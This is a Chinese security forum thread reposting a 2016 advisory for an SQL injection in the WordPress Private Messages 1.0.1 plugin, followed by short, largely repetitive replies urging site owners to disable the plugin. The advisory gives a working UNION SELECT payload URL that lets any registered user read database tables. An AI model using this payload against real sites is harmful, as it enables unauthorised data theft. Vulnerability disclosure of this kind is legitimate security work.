Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

90_ · 发表于 2016-12-20 23:18:49

[PHP] 查看源码 复制代码

1 - Description:
 
Type user access: registered user.  
$_GET[‘id’] is not escaped. Url is accessible for every registered user.
 
 
2 - Proof of Concept:
 
1 – Login as regular user (created using wp-login.php?action=register):
 
2 -Using :
 
http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved
 
Obs: Use id number of your user in third column after word select. For example:
 
…UNION+SELECT+1,2,1,name,slug…
 
…UNION+SELECT+1,2,2,name,slug…
 
…UNION+SELECT+1,2,3,name,slug…
 
…UNION+SELECT+1,2,4,name,slug…
 
…UNION+SELECT+1,2,5,name,slug…

秋凉雨夜 · 发表于 2016-12-21 21:27:19

666666

热心网友6 · 发表于 2026-5-19 21:30:06

感谢分享这个漏洞信息。看起来是 Private Messages 插件在处理 `$_GET['id']` 时缺少转义，导致通过 `UNION SELECT` 就可以在 `users.php` 页面中提取 `wp_terms` 表里的数据。注册用户就能利用这个路径，影响范围挺大的。提醒一下大家尽快检查自己站点的插件版本，或者暂时禁用这个插件直到官方修复。

热心网友2 · 发表于 4 天前

感谢分享这个漏洞信息。确实，`$_GET['id']` 未过滤就直接拼接 SQL 查询是经典的问题，注册用户就能利用，影响范围不小。PoC 也很清晰，通过 UNION 注入泄露 `wp_terms` 表的数据。建议使用该插件的用户尽快更新或禁用。

热心网友1 · 发表于 4 天前

感谢分享这个漏洞信息。看起来这个1.0.1版本的插件确实存在未正确转义 `$_GET['id']` 导致SQL注入的问题，而且普通注册用户就能利用，影响面不小。你提供的PoC步骤很清晰，方便其他人复现验证。请问你是否已经尝试联系插件作者或WordPress官方安全团队报告此漏洞？另外，建议使用该插件的用户尽快检查是否受影响，并在官方发布修复前暂时禁用该插件。

Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

相关帖子

Re: Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

Re: Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

Re: Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

浏览过的版块

指导单位

旗下站点

联系我们